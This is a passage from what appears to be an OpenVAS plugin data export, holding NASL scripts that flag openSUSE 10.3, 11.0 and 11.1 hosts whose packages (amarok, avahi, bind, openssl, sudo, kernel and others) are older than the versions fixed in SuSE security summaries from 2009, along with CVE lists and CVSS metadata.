rpm:\"tsclient~2.0.2~2.29.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tsclient-devel\", rpm:\"tsclient-devel~2.0.2~2.29.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xrdp\", rpm:\"xrdp~0.4.1~16.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-bootloader\", rpm:\"yast2-bootloader~2.17.50~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-network\", rpm:\"yast2-network~2.17.66~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-network-devel-doc\", rpm:\"yast2-network-devel-doc~2.17.66~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"attr\", rpm:\"attr~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~115.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~115.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils\", rpm:\"avahi-utils~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils-gtk\", rpm:\"avahi-utils-gtk~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~119.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr\", rpm:\"libattr~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr-devel\", rpm:\"libattr-devel~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-client3\", rpm:\"libavahi-client3~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-common3\", rpm:\"libavahi-common3~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-core5\", rpm:\"libavahi-core5~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-devel\", rpm:\"libavahi-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib-devel\", rpm:\"libavahi-glib-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib1\", rpm:\"libavahi-glib1~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject-devel\", rpm:\"libavahi-gobject-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject0\", rpm:\"libavahi-gobject0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-ui0\", rpm:\"libavahi-ui0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdns_sd\", rpm:\"libdns_sd~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libhowl0\", rpm:\"libhowl0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libnasl\", rpm:\"libnasl~2.2.10~59.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng3\", rpm:\"libpng3~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng12-0\", rpm:\"libpng12-0~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-debug\", rpm:\"nouveau-kmp-debug~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-default\", rpm:\"nouveau-kmp-default~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-pae\", rpm:\"nouveau-kmp-pae~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-xen\", rpm:\"nouveau-kmp-xen~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.8~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-avahi\", rpm:\"python-avahi~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p15~13.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"syslog-ng\", rpm:\"syslog-ng~1.6.12~76.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-video-nouveau\", rpm:\"xorg-x11-driver-video-nouveau~0.10.1.20081112~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-video-nouveau-3d\", rpm:\"xorg-x11-driver-video-nouveau-3d~0.10.1.20081112~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~77.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~77.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl\", rpm:\"avahi-compat-howl~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder\", rpm:\"avahi-compat-mDNSResponder~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-devel\", rpm:\"avahi-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-glib\", rpm:\"avahi-glib~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-python\", rpm:\"avahi-python~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-qt3\", rpm:\"avahi-qt3~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-qt4\", rpm:\"avahi-qt4~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~75.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libnasl\", rpm:\"libnasl~2.2.10~15.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng\", rpm:\"libpng~1.2.18~15.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.18~15.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p2~23.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"syslog-ng\", rpm:\"syslog-ng~1.6.12~33.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0125", "CVE-2008-2383", "CVE-2008-3197", "CVE-2008-5902", "CVE-2008-1924", "CVE-2009-0034", "CVE-2009-0135", "CVE-2008-5907", "CVE-2008-5432", "CVE-2008-2960", "CVE-2008-5824", "CVE-2008-4326", "CVE-2009-0136", "CVE-2008-5904", "CVE-2008-1567", "CVE-2008-1149", "CVE-2008-5903", "CVE-2008-4309", "CVE-2009-0126", "CVE-2008-4096", "CVE-2008-5081", "CVE-2008-5621"], "description": "The remote host is missing updates announced in\nadvisory SUSE-SR:2009:003. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.", "modified": "2018-04-06T00:00:00", "published": "2009-02-02T00:00:00", "id": "OPENVAS:136141256231063304", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063304", "type": "openvas", "title": "SuSE Security Summary SUSE-SR:2009:003", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sr_2009_003.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SR:2009:003\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SR:2009:003. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.\";\n\ntag_solution = \"Update all out of date packages.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63304\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-02 23:28:24 +0100 (Mon, 02 Feb 2009)\");\n script_cve_id(\"CVE-2008-3197\", \"CVE-2008-5081\", \"CVE-2008-5432\", \"CVE-2008-1149\", \"CVE-2008-5824\", \"CVE-2008-5903\", \"CVE-2008-5902\", \"CVE-2008-5907\", \"CVE-2008-5904\", \"CVE-2008-1567\", \"CVE-2009-0125\", \"CVE-2009-0126\", \"CVE-2008-4326\", \"CVE-2008-4309\", \"CVE-2008-2960\", \"CVE-2008-5621\", \"CVE-2008-2383\", \"CVE-2008-1924\", \"CVE-2009-0034\", \"CVE-2009-0136\", \"CVE-2008-4096\", \"CVE-2009-0135\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Summary SUSE-SR:2009:003\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi\", rpm:\"at-spi~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-devel\", rpm:\"at-spi-devel~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-doc\", rpm:\"at-spi-doc~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-lang\", rpm:\"at-spi-lang~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"attr\", rpm:\"attr~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~140.18.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~140.18.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"autofs\", rpm:\"autofs~5.0.3~82.28.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils\", rpm:\"avahi-utils~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"backup-manager\", rpm:\"backup-manager~0.1.0~13.12.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"backup-manager-lang\", rpm:\"backup-manager-lang~0.1.0~13.12.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brasero\", rpm:\"brasero~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brasero-doc\", rpm:\"brasero-doc~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brasero-lang\", rpm:\"brasero-lang~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~145.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash\", rpm:\"crash~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-devel\", rpm:\"crash-devel~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-doc\", rpm:\"crash-doc~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-sial\", rpm:\"crash-sial~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-main-menu\", rpm:\"gnome-main-menu~0.9.11~22.9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2\", rpm:\"gtk2~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-branding-upstream\", rpm:\"gtk2-branding-upstream~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-devel\", rpm:\"gtk2-devel~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-doc\", rpm:\"gtk2-doc~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-lang\", rpm:\"gtk2-lang~2.14.4~6.4.5\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal\", rpm:\"hal~0.5.12~10.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"hal-devel\", rpm:\"hal-devel~0.5.12~10.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr\", rpm:\"libattr~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr-devel\", rpm:\"libattr-devel~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-client3\", rpm:\"libavahi-client3~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-common3\", rpm:\"libavahi-common3~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-core5\", rpm:\"libavahi-core5~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-devel\", rpm:\"libavahi-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib-devel\", rpm:\"libavahi-glib-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib1\", 